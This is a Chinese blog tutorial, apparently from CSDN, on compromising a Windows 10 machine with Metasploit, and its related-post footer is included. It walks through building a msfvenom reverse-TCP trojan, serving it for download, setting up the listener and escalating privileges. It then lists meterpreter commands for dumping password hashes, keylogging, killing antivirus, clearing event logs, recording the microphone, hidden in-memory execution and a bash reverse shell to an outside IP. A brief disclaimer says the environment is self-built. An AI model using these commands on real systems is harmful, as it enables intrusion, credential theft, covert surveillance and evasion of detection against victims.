msf win10系统攻击

已于 2022-10-03 19:04:35 修改
阅读量4.7k 收藏 57
点赞数 4
文章标签: java 服务器 开发语言
于 2022-10-02 21:01:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58199719/article/details/127146128
版权

前言:学习网络技术 本环境自己搭建
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

kali ip 192.168.141.129

windwos10 192.168.141.128

一、木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 -f exe > shell.exe   //保存到跟目录

 二、开启apach服务 service apache2 start

查看状态 ervice apache2 status

接下来把我们的木马文件 上传到apach里面

cp shell.exe /var/www/html

三、客户端访问下载打开 注:关闭杀毒 或者允许

 四、kali开启监听 msf

 (1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload  windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.141.129(填写自己主机的IP地址)

(4)命令: set lport 3333(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit    //  -z -j(后台执行)

五、进入win10系统

注:木马可以做免杀 ,不然杀毒软件 会杀掉

六、提权

咱们权限只有管理员权限 需要提权

会话保持在后台  background 命令

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

use post/multi/recon/local_exploit_suggester

 接下来 利用这些搜索出来的 利用exp提权

常见的提权模块如下:

ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞
常用提权命令

sysinfo 查看系统命令
migrate 注入进程
getuid 获取当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

ps 列出进程
sessions 查看会话
background 把session放置后台
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
interact id #切换进一个信道
back 返回主界面
shell 得到终端
search搜索模块
show 列模块
info 查看模块信息

    meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传 
    nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 
    -m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查            
    杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

	meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件

后面一些操作

msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)__Cyber的博客-CSDN博客_msf键盘记录

小晨_WEB
关注
  • 4
    点赞
  • 57
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
这些问题可能需要寻找特定版本的Shellter或在其他操作系统(如Win10)上完成加壳操作。 5. **Shellter操作模式**:Shellter提供了自动(Auto)、手动(Manual)和帮助(Help)三种模式。自动模式下,工具会自动注入后门;...
利用msf入侵电脑
weixin_44761350的博客
05-25 1168
msf
cve-2020-0796_【CVE20200796】漏洞复现
weixin_39644139的博客
11-30 621
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
如何使用kali来入侵(渗透)一台windows
zz12345600354的博客
06-05 516
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 444
1.导入hutool的maven依赖。2.复制一下代码执行。
golang 接口
m0_70982551的博客
07-24 1140
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口定义的所有方法。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 243
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 617
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
26.jdk源码阅读之ConcurrentLinkedQueue
最新发布
前端、移动端、后端源码级底层原理分享
07-29 850
ConcurrentLinkedQueue 是 Java 提供的一个基于无界非阻塞算法的线程安全队列。它是一个适用于高并发环境的队列实现,基于链表结构。
Java的@DateTimeFormat注解与@JsonFormat注解的使用对比
訾博(ZiBo)的博客
07-27 736
在Spring和Jackson框架,日期和时间格式化是一个常见需求。注解主要用于Spring的表单绑定,而注解则用于Jackson的JSON序列化和反序列化。了解这两个注解的使用场景和方法,可以帮助开发者更高效地处理日期和时间。和是处理日期和时间格式化的两个重要注解。主要用于Spring MVC的请求参数绑定,而主要用于Jackson的JSON序列化和反序列化。了解它们的使用场景和功能,可以帮助开发者更高效地处理日期和时间格式化需求。通过本文的介绍,希望读者能够更清晰地理解和。
Java修炼 2024.7.26 0:24
2301_80011650的博客
07-26 466
问题:编写一个方法,找出一个数组的众数(出现次数超过数组长度一半的元素)。例如,输入 [2, 2, 1, 1, 2],输出 2。编写一个方法,找出一个整数数组的第二大元素。例如,输入 [3, 5, 1, 8, 7],输出 7。例如,输入 5,输出 5。问题:编写一个方法,将给定的字符串逆转。问题:使用数组实现栈,并提供基本操作(push、pop、peek、isEmpty)。问题:实现一个单向链表,并提供基本的操作(添加、删除、查找元素)。问题:编写一个方法来查找一个给定字符串的所有子串。
Java代码基础算法练习-数的特性-2024.07.25
Sakurapaid的博客
07-25 418
小A喜欢两种性质都成立的数字,小B喜欢至少符合一种性质的数字,小C喜欢不符合这两种性质的 数字。给出一个数字,请输出三个人是否喜欢这个数字。如果喜欢输出1,否则输出0,用空格分隔。输入数字 num,先定义三个整型代表三个人的喜欢与否,先默认设为 0。之后判断num对于性质1、2的条件,分别用 boolen 类型标识。对于每个整型进行判断,是否改为 1 代表喜欢。性质2:大于4且不大于12;
新建springboot项目找不到java版本8?
weixin_74009895的博客
07-28 221
新建springboot项目找不到java版本8?
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
PAP
07-26 217
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
高级java每日一道面试题-2024年7月29日-并发篇-什么时候用乐观锁,什么时候用悲观锁?
qq_43071699的博客
07-29 653
悲观锁适用于数据竞争激烈的场景,能够提供强一致性,但可能导致较多的线程等待。乐观锁适用于读多写少的场景,能够提供更高的并发性能,但可能需要多次尝试才能成功更新数据。
msf永恒之蓝攻击win10
09-01
根据提供的引用内容,永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限的攻击方式。然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统攻击。永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework使用永恒之蓝攻击模块对Windows 10进行攻击,你需要使用另外一个模块,如`ms17_010_psexec`或`ms17_010_eternalromance`等。这些模块允许利用永恒之蓝漏洞攻击Windows 10系统。 请注意,进行任何形式的攻击都是非法的,除非你有合法的授权并且在合法和合规的环境进行。我强烈建议遵守法律和道德准则,避免从事非法活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [经典利用永恒之蓝漏洞对Windows操作系统进行攻击](https://blog.csdn.net/qq_46202048/article/details/121535176)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值